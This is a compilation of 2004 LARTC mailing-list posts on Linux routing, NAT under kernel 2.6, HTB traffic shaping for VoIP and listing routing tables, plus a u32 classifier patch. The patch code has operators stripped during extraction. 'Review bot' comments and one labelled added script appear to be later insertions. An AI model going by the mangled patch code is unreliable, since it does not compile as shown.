323: from 172.16.1.13 lookup main map-to 231.222.222.111
32766: from all lookup main
32767: from all lookup default

So I'm trying to translate local address 172.16.1.13 to 231.222.222.111. And that was working under the 2.4 kernel. But now I have to move to the 2.6 kernel and now it's not working. I've used these commands:

ip route add nat 231.222.222.111 via 172.16.1.13
ip rule add prio 323 from 172.16.1.13 nat 231.222.222.111

!!! To be sure that it is a kernel problem I've added these two rules at the very beginning of my FORWARD chain:

iptables -I FORWARD -s 172.16.1.13 -j LOG
iptables -I FORWARD -d 231.222.222.111 -j LOG

Look, I have packets that should not be there:

Oct 27 00:30:04 rcline IN=eth1 OUT=eth0 SRC=172.16.1.13 DST=64.12.161.185 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=43039 DF PROTO=TCP SPT=1923 DPT=5190 WINDOW=65535 RES=0x00 SYN URGP=0
Oct 27 00:30:04 rcline IN=eth0 OUT=eth1 SRC=83.102.131.142 DST=231.222.222.111 LEN=84 TOS=0x00 PREC=0x00 TTL=59 ID=2990 DF PROTO=ICMP TYPE=8 CODE=0 ID=22310 SEQ=2991

No substitution of either destination or source addresses!!! Please help me to make this work. I've tried the 2.6.9 kernel, but it seems there is no "IP: fast network address translation". Why? Is the feature already deprecated?
Re: [LARTC] maybe OT, Linux TCP programming
On Wed, Nov 10, 2004 at 10:24:49PM +0100, Damjan wrote:

> Is there a way in Linux socket programming, when using TCP sockets to be able to require notifications of when the TCP ACK packets are received. If I send some data over a TCP socket, I'd like to know for sure if the data reached its recipient. A blocking send call, that blocks until all ACK's for the data are received back, would be good enough.

If you want that, you have to make your own 'tcp' with UDP. Another solution is to set a very small window size, select(2) will then return on reception of the ACK. Set the window size to one packet in that case (~1500 bytes).

Good luck!

-- http://www.PowerDNS.com Open source, database driven DNS Software
http://lartc.org Linux Advanced Routing Traffic Control HOWTO
[LARTC] LARTC outage
Hi LARTC admins, I'm the linuximq mailing list admin and we figured out that your list has been down since Fri Nov 5 2004. Can you please confirm this and let us know if there is any scheduled date for its return? Please let us know if we can help somehow... tks in advance.

Andre
[LARTC] [PATCH] [TRY2] Use nfmark as a key in u32 classifier
Hello! This is the try number two. What was changed: - Added selectable choice in Kconfig file (thanks Jamal!) - Don't abuse tc_u32_sel to not break backward compatibility (thanks Patrick!). Stephen, do you have any comments on iproute2 part? I know it's not perfect but this is the best way, I think. u32 match mark it's intuitive but breaks a little the levels, u32 mark it's ok but not intuitive If you want I can rewrite it if you want. Thank you for your time. Signed-off-by: Catalin(ux aka Dino) catab at umbrella.ro --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/--- linux.orig/net/sched/Kconfig2004-10-19 00:55:06.0 +0300 +++ linux/net/sched/Kconfig 2004-11-09 12:47:36.0 +0200 @@ -334,6 +334,18 @@ config NET_CLS_IND Requires a new iproute2 You MUST NOT turn this on if you dont have an update iproute2. +config CLS_U32_MARK + bool Use nfmark as a key in U32 classifier + depends on NET_CLS_U32 + help + This allows you to match mark in a u32 filter. + Example: + tc filter add dev eth0 protocol ip parent 1:0 prio 5 u32 \ + match mark 0x0090 0x \ + match ip dst 4.4.4.4 \ + flowid 1:90 + You must use a new iproute2 to use this feature. + config NET_CLS_RSVP tristate Special RSVP classifier depends on NET_CLS NET_QOS --- linux.orig/net/sched/cls_u32.c 2004-10-19 00:53:45.0 +0300 +++ linux/net/sched/cls_u32.c 2004-11-09 13:56:42.0 +0200 @@ -27,6 +27,7 @@ * JHS: We should remove the CONFIG_NET_CLS_IND from here * eventually when the meta match extension is made available * + * nfmark match added by Catalin(ux aka Dino) BOIE catab at umbrella.ro */ #include asm/uaccess.h @@ -57,6 +58,13 @@ #include net/pkt_sched.h +struct tc_u32_mark +{ + __u32 val; + __u32 mask; + __u32 success; +}; + struct tc_u_knode { struct tc_u_knode *next; @@ -78,6 +86,9 @@ struct tc_u_knode #ifdef CONFIG_CLS_U32_PERF struct tc_u32_pcnt *pf; #endif +#ifdef CONFIG_CLS_U32_MARK + struct tc_u32_mark mark; +#endif struct tc_u32_sel sel; }; 
@@ -139,6 +150,16 @@ next_knode: n-pf-rcnt +=1; j = 0; #endif + +#ifdef CONFIG_CLS_U32_MARK + if ((skb-nfmark n-mark.mask) != n-mark.val) { + n = n-next; + goto next_knode; + } else { + n-mark.success++; + } +#endif + for (i = n-sel.nkeys; i0; i--, key++) { if ((*(u32*)(ptr+key-off+(off2key-offmask))^key-val)key-mask) { @@ -615,6 +636,7 @@ static int u32_change(struct tcf_proto * struct tc_u_hnode *ht; struct tc_u_knode *n; struct tc_u32_sel *s; + struct tc_u32_mark *mark; struct rtattr *opt = tca[TCA_OPTIONS-1]; struct rtattr *tb[TCA_U32_MAX]; u32 htid; @@ -718,6 +740,16 @@ static int u32_change(struct tcf_proto * } n-fshift = i; } + +#ifdef CONFIG_CLS_U32_MARK + if (tb[TCA_U32_MARK-1] == 0 || + RTA_PAYLOAD(tb[TCA_U32_MARK-1]) sizeof(struct tc_u32_mark)) + return -EINVAL; + mark = RTA_DATA(tb[TCA_U32_MARK-1]); + memcpy(n-mark, mark, sizeof(struct tc_u32_mark)); + n-mark.success = 0; +#endif + err = u32_set_parms(tp-q, base, ht, n, tb, tca[TCA_RATE-1]); if (err == 0) { struct tc_u_knode **ins; @@ -805,6 +837,12 @@ static int u32_dump(struct tcf_proto *tp RTA_PUT(skb, TCA_U32_CLASSID, 4, n-res.classid); if (n-ht_down) RTA_PUT(skb, TCA_U32_LINK, 4, n-ht_down-handle); + +#ifdef CONFIG_CLS_U32_MARK + if (n-mark.val || n-mark.mask) + RTA_PUT(skb, TCA_U32_MARK, sizeof(n-mark), n-mark); +#endif + #ifdef CONFIG_NET_CLS_ACT /* again for backward compatible mode - we want * to work with both old and new modes of entering --- linux.orig/include/linux/pkt_cls.h 2004-10-19 00:53:07.0 +0300 +++ linux/include/linux/pkt_cls.h 2004-11-09 09:50:45.0 +0200 @@ -190,6 +190,7 @@ enum TCA_U32_ACT, TCA_U32_INDEV, TCA_U32_PCNT, + TCA_U32_MARK, __TCA_U32_MAX }; --- iproute2-2.6.9/tc/f_u32.c.orig 2004-11-04 15:38:53.0 +0200 +++ iproute2-2.6.9/tc/f_u32.c 2004-11-09 13:59:00.0 +0200 @@ -7,6 +7,7 @@ * 2 of the License, or (at your option) any later version. * * Authors:Alexey Kuznetsov, [EMAIL PROTECTED] + * Match mark added by Catalin(ux aka Dino) BOIE catab at umbrella.ro [5 nov 2004] * */ 
@@ -33,7 +34,7 @@ static void explain(void) fprintf(stderr, or
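Review bot: In the net/sched/Kconfig hunk, CLS_U32_MARK depends only on NET_CLS_U32, while the cls_u32.c code it enables reads skb->nfmark. If that field is only present in sk_buff when netfilter is configured, a kernel with this option on and netfilter off will not compile; add NETFILTER to the depends line so the option cannot be selected in that configuration.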
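Review bot: struct tc_u32_mark is defined privately in cls_u32.c (hunk at -57,6 +58,13), yet it is the payload of the TCA_U32_MARK attribute that userspace has to build and that u32_dump sends back with RTA_PUT. Move the definition to include/linux/pkt_cls.h next to the new TCA_U32_MARK enum value so the kernel and iproute2 share one layout instead of two copies that can drift.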
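Review bot: In the classify hunk (-139,6 +150,16) the packet mark is masked but n->mark.val is compared as supplied, so a filter whose val has bits outside its mask silently never matches. Either store val already masked in u32_change or reject such input there. The n->mark.success++ in the same block also writes to the knode on every matching packet and is not under CONFIG_CLS_U32_PERF like the n->pf counters just above it; consider keeping the hit counter with the other performance counters.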
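Review bot: In u32_change (hunk -718,6 +740,16) the new block returns -EINVAL when tb[TCA_U32_MARK-1] is absent, so with CONFIG_CLS_U32_MARK enabled every u32 filter that carries no mark match is refused. Treat a missing attribute as "no mark" (val and mask both 0, which the classify test always passes and u32_dump already skips) and return an error only for a payload of the wrong size. The bare return also comes after n has been filled in (n->fshift is assigned just above), so check that it does not bypass the cleanup the rest of the function relies on.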
[LARTC] htb , tcp over udp problem
hello

I have
1:10 for tcp prio 1
1:20 for udp prio 0
under the same parent; it works perfectly, but if I decide to make 1:10 for all ... then voip gets slow ...

I have also tried to attach 1:20 with two more classes, 1 prio for normal udp, 0 prio for voip udp ... still voip gets slow

I have even tried to use it with iptables and tried different combinations, still ...

Can anyone help or explain about tcp vs. udp?

thanks
[LARTC] command to list ip route tables
In linux one can have several route tables. But how do I list the route tables? (and no 'ip rule list' is not it)

--
damjan | This is my jabber ID -- [EMAIL PROTECTED] -- not my mail address!!!
[LARTC] SEPARATING VOIP AND SURFING
Dear list:

I have a problem I cannot handle yet, and need to solve it as soon as possible. I would be very grateful to anybody who can help me.

I have a 512/512 link to internet, that I want to share between several computers. I have eth0, with a public IP address, connected to Internet, and also eth1, with a private IP address, for the network with the surfing computers.

I have a main class with the whole 512kbit, then 2 child classes in this way (you can see the complete script at the end):

class 1: rate = ceil = 64kbit, prio 0, for VOIP
class 2: rate = ceil = 448kbit, for SURFING

Class 2 is subdivided again in about 20 classes, for 20 surfing computers, this way:

class 3: rate = 18kbit, ceil = 448kbit, prio 1, SURF

I have a classical problem (I think). As you can see, the first 64kbit are for VOIP, so the best quality and the minimal delays are necessary. 64Kbit is pretty enough for 1 VOIP channel (it is supposed to really use no more than 20kbit). And also, the 64kbit class has the highest priority.

Nevertheless, especially when all 20 users are surfing, or some users are browsing heavy pages, or when 2 or more users are downloading at the same time, I cannot get VOIP to work properly, because quality becomes very poor.

I have made all kinds of imaginable tests, probes and combinations, trying different burst values for classes, attaching sfq qdiscs to all leaf classes, then only to surfing classes, then only to VOIP classes, and even gaming with R2Q/Quantums, which would not be necessary, because 64Kbit is much more than enough.

So please, does anyone have any idea how to completely separate VOIP and SURFING, making 2 independent channels, without one service affecting the other ??

Many thanks in advance.

If you are still able to read, after having read all this stuff, here goes my script as it is now...

Best Regards to everybody.

Ricardo.
#!/bin/bash
tc qdisc add dev eth1 root handle 1: htb default 121 r2q 1
tc qdisc add dev eth0 root handle 1: htb default 20 r2q 5
tc class add dev eth1 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit
tc class add dev eth0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit
tc class add dev eth1 parent 1:1 classid 1:10 htb rate 64kbit ceil 64kbit prio 0
tc class add dev eth0 parent 1:1 classid 1:10 htb rate 64kbit ceil 64kbit prio 0
tc class add dev eth1 parent 1:1 classid 1:20 htb rate 448kbit ceil 448kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:20 htb rate 448kbit ceil 448kbit prio 1
# PER MACHINE OR IP CLASSES
tc class add dev eth1 parent 1:20 classid 1:90 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:91 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:101 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:102 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:103 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:104 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:105 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:106 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:107 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:108 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:109 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:110 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:111 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:112 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:113 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:114 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:115 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:116 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:117 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:118 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:119 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:120 htb rate 18kbit ceil 448kbit prio 1
tc class add dev eth1 parent 1:20 classid 1:121 htb rate 18kbit ceil 448kbit prio 1
# SFQ QDISCS PER LEAF CLASS
# VOIP
tc qdisc add dev eth0 parent 1:10 handle 10: sfq perturb 10
tc qdisc add dev eth0 parent 1:20 handle 20: sfq perturb 10
#SURFING
tc qdisc add dev eth1 parent 1:10 handle 10: sfq perturb 10
tc qdisc add dev eth1 parent 1:90 handle 90: sfq perturb 10
tc qdisc add dev eth1 parent 1:91 handle 91: sfq perturb 10
tc qdisc add dev eth1 parent 1:101 handle 101: sfq perturb 10
tc qdisc add dev eth1 parent 1:102 handle 102: sfq perturb 10
tc qdisc add
[LARTC] the list is back online
Hi everybody,

Sometime last week outpost.ds9a.nl's disk filled up and mailman corrupted one of its databases. It took quite some time to fix this, for which I apologize. But we're back now!

For posterity, the log file reported:

    Nov 13 13:27:33 2004 (25374) Delivery exception: EOF read where object expected
    Nov 13 13:27:33 2004 (25374) Traceback (most recent call last):
      File /usr/lib/mailman/Mailman/Handlers/HandlerAPI.py, line 82, in do_pipeline
        func(mlist, msg, msgdata)
      File /usr/lib/mailman/Mailman/Handlers/Hold.py, line 152, in process
        hold_for_approval(mlist, msg, msgdata, NonMemberPost)
      File /usr/lib/mailman/Mailman/Handlers/Hold.py, line 218, in hold_for_approval
        mlist.HoldMessage(msg, reason, msgdata)
      File /var/lib/mailman/Mailman/ListAdmin.py, line 146, in HoldMessage
        self.__opendb()
      File /var/lib/mailman/Mailman/ListAdmin.py, line 70, in __opendb
        self.__db = marshal.load(fp)
    EOFError: EOF read where object expected

The solution was to delete the request.db (or at least move it), which unwedged mailman mostly. The final solution was to run 'listzap' by Wichert Akkerman, which zonked the outstanding requests database, allowing the mailman administrative website to function again. Thanks Wichert!

Anyhow, happy LARTC-ing!

--
http://www.PowerDNS.com Open source, database driven DNS Software
http://lartc.org Linux Advanced Routing Traffic Control HOWTO
[LARTC] Re: please check your mesages thnx
On Mon, 01 Nov 2004 11:38:45 +0100, [EMAIL PROTECTED] wrote:
> McAfee GroupShield Exchange
> ** Alert generated at: Monday, November 01, 2004 12:54:27 FLE Standard Time **
> The item GSEBODY_213471_5524_1099306467.txt has been replaced by Takas mail system because it was infected by the W32/[EMAIL PROTECTED] virus.
Re: [LARTC] Reset Statistics?
On Wednesday, 10 November 2004 18:10, Sven Anders wrote:
> Is it possible to reset the statistics (ip -s link) ?? If not, why. Maybe there is a trick?

Try to restart your tc config?

--
.: Jakub Gazik (zytek)
.: email: [EMAIL PROTECTED]
.: JID: [EMAIL PROTECTED]
Re: [LARTC] Reset Statistics?
* Sven Anders [EMAIL PROTECTED] 2004-11-10 18:10
> Is it possible to reset the statistics (ip -s link) ?? If not, why. Maybe there is a trick?

The statistics are stored in the driver but you can write a kernel module calling get_stats for each netdevice and set them to 0.

    /* needs <linux/netdevice.h> and <linux/rtnetlink.h> */
    struct net_device *dev;

    rtnl_lock();
    read_lock(&dev_base_lock);
    for (dev = dev_base; dev; dev = dev->next) {
            /* get_stats takes the device; skip drivers that lack it */
            struct net_device_stats *s =
                    dev->get_stats ? dev->get_stats(dev) : NULL;
            if (s)
                    memset(s, 0, sizeof(*s));
    }
    read_unlock(&dev_base_lock);
    rtnl_unlock();

Both dev_base and dev_base_lock are exported symbols. Not tested but might work.
Re: [LARTC] command to list ip route tables
Damjan wrote:
> In linux one can have several route tables. But how do I list the route tables? (and no 'ip rule list' is not it)

    ip route list table <table name>

HTH,
-- Martin
Re: [LARTC] command to list ip route tables
On Wed, Nov 10, 2004 at 10:21:06PM +0100, Damjan wrote:
> In linux one can have several route tables. But how do I list the route tables? (and no 'ip rule list' is not it)

With `ip rule show' you can determine which tables are set/used. With `ip route show table TABLE' you can list the table you want to look in.

    # ip rule show
    0:      from all lookup local
    32766:  from all lookup main
    32767:  from all lookup default

In this example local, main and default are the tables.

--
Robert Felber (EDV-Leitung)
Autohaus Erich Kuttendreier
Drosselweg 21
81827 Muenchen
Tel: +49 (0) 89 / 453 12-86
Fax: +49 (0) 89 / 453 12-80
PGP: 896CF30B
PGP-Fingerprint: CF36 AA93 9716 63E8 962F 15CC A80E 1A79 BF77 25EA
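Added example, not part of the original thread: the two replies above name `ip rule show` and `ip route show table`; this script chains them by pulling every table named after `lookup` out of the rule list and dumping each one. The helper names and the sample rules for tables `voip` and `100` are constructed for illustration.

```shell
#!/bin/sh
# Reads `ip rule show` output on stdin and prints each referenced
# routing table once, in rule order.
tables_from_rules() {
    awk '{
        for (i = 1; i < NF; i++)
            if ($i == "lookup" && !seen[$(i + 1)]++)
                print $(i + 1)
    }'
}

# Constructed sample: the three default rules quoted in the reply above
# plus two made-up policy rules (tables "voip" and "100" are hypothetical).
SAMPLE_RULES='0:      from all lookup local
100:    from 192.168.2.0/24 lookup voip
200:    from all fwmark 0x1 lookup 100
300:    from 192.168.2.5 lookup voip
32766:  from all lookup main
32767:  from all lookup default'

# Tables referenced by the constructed sample, one per line.
sample_tables() {
    printf '%s\n' "$SAMPLE_RULES" | tables_from_rules
}

# On a live router: print the routes of every table a rule points at.
dump_all_tables() {
    ip rule show | tables_from_rules | while read -r t; do
        echo "== table $t =="
        ip route show table "$t"
    done
}

# Only touch the live system when asked to and when `ip` is installed.
if [ "${1:-}" = "live" ] && command -v ip >/dev/null 2>&1; then
    dump_all_tables
fi
```

A table that holds routes but is not referenced by any rule does not show up this way; `ip route show table all` prints the routes of every table.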
[LARTC] icmp
Anybody know how to shape icmp traffic using htb.init script ?
Re: [LARTC] What determines DROP versus delay (BACKLOG)?
On Saturday 06 November 2004 20:48, gypsy wrote:
> HTB:
> class htb 1:40 parent 1:1 leaf 40: prio 3 rate 358Kbit ceil 529Kbit \
>  burst 6Kb cburst 2260b
>  Sent 145871726 bytes 97293 pkts (dropped 69, overlimits 0)
>  rate 56741bit 37pps backlog 23p
>  lended: 77429 borrowed: 19841 giants: 0
>
> I would like to increase backlog because I think that would decrease dropped. 23 packets of 1500 bytes each is only 34,500 bytes. IMO, there could be up to 64K bytes.
>
> 1) What determines backlog?

I'm not sure, but backlog means packets in the queue ready to send. You need backlog so htb can work. Backlog means there are enough packets for htb to work.

> 2) How can it be altered?

It can't.

> 3) Am I on the right track here?

I'm afraid not.

Stef

--
[EMAIL PROTECTED]
Using Linux as bandwidth manager
http://www.docum.org/
Re: [LARTC] What determines DROP versus delay (BACKLOG)?
gypsy wrote:
> HTB:
> class htb 1:40 parent 1:1 leaf 40: prio 3 rate 358Kbit ceil 529Kbit \
>  burst 6Kb cburst 2260b
>  Sent 145871726 bytes 97293 pkts (dropped 69, overlimits 0)
>  rate 56741bit 37pps backlog 23p
>  lended: 77429 borrowed: 19841 giants: 0
>
> I would like to increase backlog because I think that would decrease dropped. 23 packets of 1500 bytes each is only 34,500 bytes. IMO, there could be up to 64K bytes.
>
> 1) What determines backlog?
> 2) How can it be altered?

If you add a queue say bfifo - you can choose the length.

> 3) Am I on the right track here?
>
> gypsy